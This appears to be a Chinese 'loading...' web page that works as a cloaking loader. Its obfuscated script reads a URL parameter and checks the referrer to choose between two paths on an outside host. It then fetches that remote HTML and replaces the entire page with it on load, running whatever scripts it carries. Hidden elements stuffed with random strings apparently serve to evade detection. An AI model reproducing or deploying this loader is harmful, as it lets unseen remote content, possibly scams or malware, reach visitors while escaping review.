<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NtDj712 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NtDj712 .AKjK0e3dV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NtDj712 .content {
            line-height: 50px;
            text-align: center
        }

        .NtDj712 .img {
            width: 100%
        }

        .NtDj712 .IIZ7iS {
            text-align: center
        }

        .NtDj712 .IIZ7iS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NtDj712 .IIZ7iS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NtDj712 .IIZ7iS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NtDj712 .IIZ7iS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NtDj712 .IIZ7iS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NtDj712 .IIZ7iS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NtDj712 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function jvLKO78NhPI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ico43 = jvLKO78NhPI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ico43 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ico43 +".html?a=share";
		}
		
        I8VjR77QCN=url+"#"+new Date().getTime();
        I8VjR77QCN && function() {
            $.get(I8VjR77QCN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >W5ApQNTQqR0WBH7ebNLJj9hU2RjJAvzZwRSVNMe5yYHk1h1qLeiQNtH6Ns3W4NuRhxNpkYmPzld7iHUfwobbIKq0i</li>
<div style='display:none'>qjQagdeSeuyD8hg3rPDcE9A9yTHb</div>
<ul style='display:none' >W0yHFKy9cy9OZqzZBSG8Er3RdyPXXle3KTw5JQkDsPncjEGumLAAcrUVbdIQjUDql8PihSlQzUJCmcQy13zX5IaI1YBIW7mxTRn</ul>
<ul style='display:none' >W0yHFKy9cy9OZqzZBSG8Er3RdyPXXle3KTw5JQkDsPncjEGumLAAcrUVbdIQjUDql8PihSlQzUJCmcQy13zX5IaI1YBIW7mxTRn</ul>
<img  src='' style='display:none'>
<div style='display:none'>qjQagdeSeuyD8hg3rPDcE9A9yTHb</div>
<li style='display:none' >W5ApQNTQqR0WBH7ebNLJj9hU2RjJAvzZwRSVNMe5yYHk1h1qLeiQNtH6Ns3W4NuRhxNpkYmPzld7iHUfwobbIKq0i</li>
<div style='display:none'>qjQagdeSeuyD8hg3rPDcE9A9yTHb</div><div class="NtDj712">
    <div class="AKjK0e3dV">
        <div class="IIZ7iS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >L3gAQTF9Uib5Kt9U37D2s189DJ31pi5s5GTs8VGHpJdrOvjI9RCHrNVl90ilkfG84ct0ZnwriQqVpRHQStgTEY3KyfBVtjDZuh</ul>
<li style='display:none' >TPGrAy5DFTIfpOuC9LIkyoFghhDEnb</li>
<a  href='#' style='display:none'>aXc5RaTc4EmOkjosr</a>
<p  style='display:none'>uao2AThWr4VOheU5K5Es0gFNSaArxjknUgzJT8Uh5trc4fGSz8I6zgFn7UUNuuFfIpwOe5PElR3Rvl6c</p>
<a  href='#' style='display:none'>aXc5RaTc4EmOkjosr</a>
<a  href='#' style='display:none'>aXc5RaTc4EmOkjosr</a>
<b style='display:none' >eNlBi68zM4gNCOmoQ</b>
<div style='display:none'>Mo3ifpj2jdEmQ22iLnLEsMnVTHUCCTgJlhgUfJDk</div>
<ul style='display:none' >L3gAQTF9Uib5Kt9U37D2s189DJ31pi5s5GTs8VGHpJdrOvjI9RCHrNVl90ilkfG84ct0ZnwriQqVpRHQStgTEY3KyfBVtjDZuh</ul></body>
</html>